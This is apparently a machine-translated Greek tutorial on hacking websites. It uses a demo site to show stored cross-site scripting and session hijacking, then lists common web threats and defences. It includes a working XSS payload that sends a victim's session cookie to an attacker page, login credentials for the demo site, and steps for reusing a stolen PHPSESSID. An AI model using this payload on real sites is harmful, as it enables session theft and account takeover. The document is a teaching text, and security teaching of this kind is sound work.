Πώς να χακάρω έναν ιστότοπο; Κοινές τεχνικές παραβίασης ιστότοπου

Τεχνικές παραβίασης ιστοσελίδων

Περισσότεροι άνθρωποι έχουν πρόσβαση στο διαδίκτυο από ποτέ. Αυτό ώθησε πολλούς οργανισμούς να αναπτύξουν εφαρμογές που βασίζονται στο διαδίκτυο τις οποίες οι χρήστες μπορούν να χρησιμοποιήσουν στο διαδίκτυο για να αλληλεπιδράσουν με τον οργανισμό. Ο κακώς γραμμένος κώδικας για εφαρμογές Ιστού μπορεί να γίνει εκμετάλλευση για να αποκτηθεί μη εξουσιοδοτημένη πρόσβαση σε ευαίσθητα δεδομένα και διακομιστές Ιστού.

Σε αυτό το σεμινάριο θα μάθετε πώς να χακάρετε ιστότοπους και θα σας παρουσιάσουμε τεχνικές εισβολής εφαρμογών Ιστού και τα μέτρα αντιμετώπισης μπορείτε να βάλετε σε θέση να προστατεύσετε από τέτοιες επιθέσεις.

Πώς να χακάρετε έναν ιστότοπο

Σε αυτό το πρακτικό σενάριο hacking ιστότοπου, πρόκειται να παραβιάσουμε την περίοδο λειτουργίας χρήστη της εφαρμογής web που βρίσκεται στη διεύθυνση www.techpanda.org. Θα χρησιμοποιήσουμε δέσμες ενεργειών μεταξύ ιστοτόπων για να διαβάσουμε το αναγνωριστικό περιόδου λειτουργίας cookie και, στη συνέχεια, να το χρησιμοποιήσουμε για να πλαστοπροσωπήσουμε μια νόμιμη συνεδρία χρήστη.

Η υπόθεση είναι ότι ο εισβολέας έχει πρόσβαση στην εφαρμογή Ιστού και θα ήθελε να παραβιάσει τις συνεδρίες άλλων χρηστών που χρησιμοποιούν την ίδια εφαρμογή. Ο στόχος αυτής της επίθεσης θα μπορούσε να είναι η απόκτηση πρόσβασης διαχειριστή στην εφαρμογή Ιστού με την προϋπόθεση ότι ο λογαριασμός πρόσβασης του εισβολέα είναι περιορισμένος.

Βήμα 1) Άνοιγμα URL http://www.techpanda.org/.

Για λόγους πρακτικής, συνιστάται ανεπιφύλακτα να αποκτήσετε πρόσβαση χρησιμοποιώντας το SQL Injection. Ανατρέξτε σε αυτό άρθρο για περισσότερες πληροφορίες σχετικά με το πώς να το κάνετε αυτό.

Βήμα 2) Εισαγάγετε τα στοιχεία σύνδεσης.

Το email σύνδεσης είναι admin@google.com, ο κωδικός πρόσβασης είναι Password2010.

Βήμα 3) Ελέγξτε τον πίνακα οργάνων.

Εάν έχετε συνδεθεί με επιτυχία, τότε θα λάβετε τον παρακάτω πίνακα ελέγχου

Χακάρετε έναν ιστότοπο

Βήμα 4) Εισαγάγετε Νέο Περιεχόμενο.

Κάντε κλικ στο Προσθήκη νέας επαφής και εισαγάγετε το ακόλουθο ως πρώτο όνομα

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

Βήμα 5) Πρόσθεση Javascript.

Ο παραπάνω κώδικας χρησιμοποιεί JavaΓραφή. Προσθέτει μια υπερ-σύνδεση με ένα συμβάν onclick. Όταν ο ανυποψίαστος χρήστης κάνει κλικ στον σύνδεσμο, το συμβάν ανακτά το PHP Αναγνωριστικό περιόδου λειτουργίας cookie και το στέλνει στο snatch_sess_id.php σελίδα μαζί με το αναγνωριστικό περιόδου σύνδεσης στη διεύθυνση URL

Χακάρετε έναν ιστότοπο

Βήμα 6) Προσθήκη λεπτομερειών.

Εισαγάγετε τις υπόλοιπες λεπτομέρειες όπως φαίνεται παρακάτω και κάντε κλικ στο Save Changes

Χακάρετε έναν ιστότοπο

Βήμα 7) Ελέγξτε τον πίνακα οργάνων.

Ο πίνακας εργαλείων σας θα μοιάζει τώρα με την παρακάτω οθόνη

Χακάρετε έναν ιστότοπο

Βήμα 8) Ελέγξτε το αναγνωριστικό συνεδρίας.

  • Δεδομένου ότι ο κώδικας δέσμης ενεργειών μεταξύ τοποθεσιών αποθηκεύεται στη βάση δεδομένων, θα φορτώνεται κάθε φορά που οι χρήστες με δικαιώματα πρόσβασης συνδέονται
  • Ας υποθέσουμε ότι ο διαχειριστής συνδέεται και κάνει κλικ στον υπερσύνδεσμο που λέει Dark
  • Θα εμφανίσει το παράθυρο με το αναγνωριστικό περιόδου σύνδεσης να εμφανίζεται στη διεύθυνση URL
  • Χακάρετε έναν ιστότοπο

    Σημείωση: το σενάριο θα μπορούσε να στέλνει την τιμή σε κάποιον απομακρυσμένο διακομιστή όπου είναι αποθηκευμένο το PHPSESSID και στη συνέχεια ο χρήστης ανακατευθύνεται πίσω στον ιστότοπο σαν να μην συνέβη τίποτα.

    Σημείωση: η τιμή που λαμβάνετε μπορεί να είναι διαφορετική από αυτήν σε αυτήν την ιστοσελίδα μάθημα hacking, αλλά η ιδέα είναι η ίδια

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    Το παρακάτω διάγραμμα ροής δείχνει τα βήματα που πρέπει να ακολουθήσετε για να ολοκληρώσετε αυτήν την άσκηση.

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    • Θα χρειαστείτε Firefox πρόγραμμα περιήγησης ιστού για αυτήν την ενότητα και πρόσθετο Tamper Data
    • Ανοικτό Firefox και εγκαταστήστε την προσθήκη όπως φαίνεται στα παρακάτω διαγράμματα

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    • Αναζητήστε δεδομένα παραβίασης και κάντε κλικ στην εγκατάσταση όπως φαίνεται παραπάνω

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    • Κάντε κλικ στο Αποδοχή και εγκατάσταση…

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    • Κάντε κλικ στο Restart now όταν ολοκληρωθεί η εγκατάσταση
    • Ενεργοποιήστε τη γραμμή μενού Firefox αν δεν εμφανίζεται

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    • Κάντε κλικ στο μενού εργαλείων και, στη συνέχεια, επιλέξτε Tamper Data όπως φαίνεται παρακάτω

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    • Θα λάβετε το παρακάτω παράθυρο. Σημείωση: Εάν το Windows δεν είναι κενό, πατήστε το κουμπί διαγραφής

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    • Κάντε κλικ στο μενού Start Tamper
    • Επιστροφή σε Firefox πρόγραμμα περιήγησης ιστού, πληκτρολογήστε http://www.techpanda.org/dashboard.php στη συνέχεια πατήστε το πλήκτρο enter για να φορτώσετε τη σελίδα
    • Θα λάβετε το ακόλουθο αναδυόμενο παράθυρο από το Tamper Data

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    • Το αναδυόμενο παράθυρο έχει τρεις (3) επιλογές. Η επιλογή Παραβίαση σάς επιτρέπει να τροποποιήσετε τις πληροφορίες κεφαλίδας HTTP προτού υποβληθούν στον διακομιστή.
    • Κάντε κλικ σε αυτό
    • Θα εμφανιστεί το παρακάτω παράθυρο

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
    • Κάντε κλικ στο κουμπί ΟΚ
    • Θα εμφανιστεί ξανά το αναδυόμενο παράθυρο δεδομένων Tamper

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    • Καταργήστε την επιλογή του πλαισίου ελέγχου που ζητά Continue Tampering;
    • Κάντε κλικ στο κουμπί υποβολής όταν τελειώσετε
    • Θα πρέπει να μπορείτε να δείτε τον πίνακα εργαλείων όπως φαίνεται παρακάτω

    Μιμητοποίηση συνεδρίας με χρήση Firefox και πρόσθετο Tamper Data

    Σημείωση: δεν συνδεθήκαμε, πλαστοπροσωπήσαμε μια περίοδο σύνδεσης χρησιμοποιώντας την τιμή PHPSESSID που ανακτήσαμε χρησιμοποιώντας δέσμες ενεργειών μεταξύ τοποθεσιών

    Τι είναι μια εφαρμογή Ιστού; Τι είναι οι διαδικτυακές απειλές;

    Μια εφαρμογή Ιστού (γνωστός και ως ιστότοπος) είναι μια εφαρμογή που βασίζεται στο μοντέλο πελάτη-διακομιστή. ο διακομιστής παρέχει πρόσβαση στη βάση δεδομένων και επιχειρηματική λογική. Φιλοξενείται σε διακομιστή web. Η εφαρμογή πελάτη εκτελείται στο πρόγραμμα περιήγησης ιστού πελάτη. Οι εφαρμογές Ιστού είναι συνήθως γραμμένες σε γλώσσες όπως π.χ Java, C# και VB.Net, PHP, ColdFusion Markup Language, κ.λπ. οι μηχανές βάσης δεδομένων που χρησιμοποιούνται σε εφαρμογές web περιλαμβάνουν MySQL, MS SQL Server, PostgreSQL, SQLiteΚ.λπ.

    Κορυφαίες τεχνικές hacking ιστότοπου

    Οι περισσότερες εφαρμογές Ιστού φιλοξενούνται σε δημόσιους διακομιστές προσβάσιμους μέσω Διαδικτύου. Αυτό τα καθιστά ευάλωτα σε επιθέσεις λόγω της εύκολης προσβασιμότητας. Τα παρακάτω είναι κοινές απειλές εφαρμογών ιστού.

    • SQL Injection – ο στόχος αυτής της απειλής θα μπορούσε να είναι η παράκαμψη αλγορίθμων σύνδεσης, η δολιοφθορά των δεδομένων κ.λπ.
    • Επιθέσεις άρνησης εξυπηρέτησης– ο στόχος αυτής της απειλής θα μπορούσε να είναι η άρνηση της πρόσβασης νόμιμων χρηστών στον πόρο
    • Cross Site Scripting XSS– Ο στόχος αυτής της απειλής θα μπορούσε να είναι η εισαγωγή κώδικα που μπορεί να εκτελεστεί στο πρόγραμμα περιήγησης από την πλευρά του πελάτη.
    • Cookie/Δηλητηρίαση συνεδρίας– Ο στόχος αυτής της απειλής είναι να τροποποιήσει τα cookie/δεδομένα περιόδου σύνδεσης από έναν εισβολέα για να αποκτήσει μη εξουσιοδοτημένη πρόσβαση.
    • Παραβίαση φόρμας – Ο στόχος αυτής της απειλής είναι να τροποποιήσει δεδομένα φόρμας, όπως τιμές σε εφαρμογές ηλεκτρονικού εμπορίου, έτσι ώστε ο εισβολέας να μπορεί να αποκτήσει αντικείμενα σε μειωμένες τιμές.
    • Έγχυση κωδικού – ο στόχος αυτής της απειλής είναι να εισάγει κώδικα όπως η PHP, Python, κ.λπ. που μπορούν να εκτελεστούν στον διακομιστή. Ο κώδικας μπορεί να εγκαταστήσει backdoors, να αποκαλύψει ευαίσθητες πληροφορίες κ.λπ.
    • Αποκατάσταση– Ο στόχος αυτής της απειλής είναι να τροποποιήσει τη σελίδα που εμφανίζεται σε έναν ιστότοπο και να ανακατευθύνει όλα τα αιτήματα σελίδας σε μια σελίδα που περιέχει το μήνυμα του εισβολέα.

    Πώς να προστατέψετε τον ιστότοπό σας από αμυχές;

    Ένας οργανισμός μπορεί να υιοθετήσει την ακόλουθη πολιτική για να προστατευτεί από επιθέσεις διακομιστή ιστού.

    • SQL Injection – η απολύμανση και η επικύρωση των παραμέτρων χρήστη πριν από την υποβολή τους στη βάση δεδομένων για επεξεργασία μπορεί να συμβάλει στη μείωση των πιθανοτήτων επίθεσης μέσω SQL Injection. Μηχανές βάσεων δεδομένων όπως ο MS SQL Server, MySQL, κ.λπ. παραμέτρους υποστήριξης και προετοιμασμένες δηλώσεις. Είναι πολύ πιο ασφαλείς από τις παραδοσιακές δηλώσεις SQL
    • Επιθέσεις άρνησης υπηρεσίας – Τα τείχη προστασίας μπορούν να χρησιμοποιηθούν για την απόρριψη της κυκλοφορίας από ύποπτη διεύθυνση IP, εάν η επίθεση είναι ένα απλό DoS. Η σωστή διαμόρφωση των δικτύων και το σύστημα ανίχνευσης εισβολής μπορούν επίσης να συμβάλουν στη μείωση των πιθανοτήτων α DoS επίθεση ήταν επιτυχής.
    • Σενάρια μεταξύ ιστοτόπων – Η επικύρωση και η απολύμανση των κεφαλίδων, των παραμέτρων που διαβιβάζονται μέσω της διεύθυνσης URL, των παραμέτρων φόρμας και των κρυφών τιμών μπορούν να βοηθήσουν στη μείωση των επιθέσεων XSS.
    • Cookie/Δηλητηρίαση συνεδρίας – αυτό μπορεί να αποφευχθεί με την κρυπτογράφηση των περιεχομένων των cookies, τη λήξη του χρονικού διαστήματος των cookies μετά από κάποιο χρονικό διάστημα, τη συσχέτιση των cookies με τη διεύθυνση IP του πελάτη που χρησιμοποιήθηκε για τη δημιουργία τους.
    • Πολτοποίηση φόρμας - Αυτό μπορεί να αποφευχθεί με την επικύρωση και την επαλήθευση της εισαγωγής χρήστη πριν από την επεξεργασία της.
    • Εισαγωγή κώδικα - Αυτό μπορεί να αποφευχθεί αντιμετωπίζοντας όλες τις παραμέτρους ως δεδομένα και όχι ως εκτελέσιμο κώδικα. Η απολύμανση και η επικύρωση μπορούν να χρησιμοποιηθούν για την υλοποίηση αυτού.
    • παραμόρφωση - μια καλή πολιτική ασφάλειας ανάπτυξης διαδικτυακών εφαρμογών θα πρέπει να διασφαλίζει ότι σφραγίζει το ευπάθειες που χρησιμοποιούνται συνήθως για την πρόσβαση στον διακομιστή ιστού. Αυτό μπορεί να είναι μια σωστή διαμόρφωση του λειτουργικού συστήματος, του λογισμικού διακομιστή ιστού και των βέλτιστων πρακτικών ασφαλείας κατά την ανάπτυξη εφαρμογών Ιστού.
    Ελεγξε αυτό: 9 καλυτερα URL Scanners to Check Link is Safe from Malware

    Σύνοψη

    • Μια εφαρμογή Ιστού βασίζεται στο μοντέλο διακομιστή-πελάτη. Η πλευρά του πελάτη χρησιμοποιεί το πρόγραμμα περιήγησης ιστού για πρόσβαση στους πόρους του διακομιστή.
    • Οι εφαρμογές Ιστού είναι συνήθως προσβάσιμες μέσω Διαδικτύου. Αυτό τους καθιστά ευάλωτους σε επιθέσεις.
    • Οι απειλές εφαρμογών Ιστού περιλαμβάνουν SQL Injection, Code Injection, XSS, Defacement, Poisoning από cookie κ.λπ.
    • Μια καλή πολιτική ασφαλείας κατά την ανάπτυξη εφαρμογών Ιστού μπορεί να σας βοηθήσει να γίνουν ασφαλείς.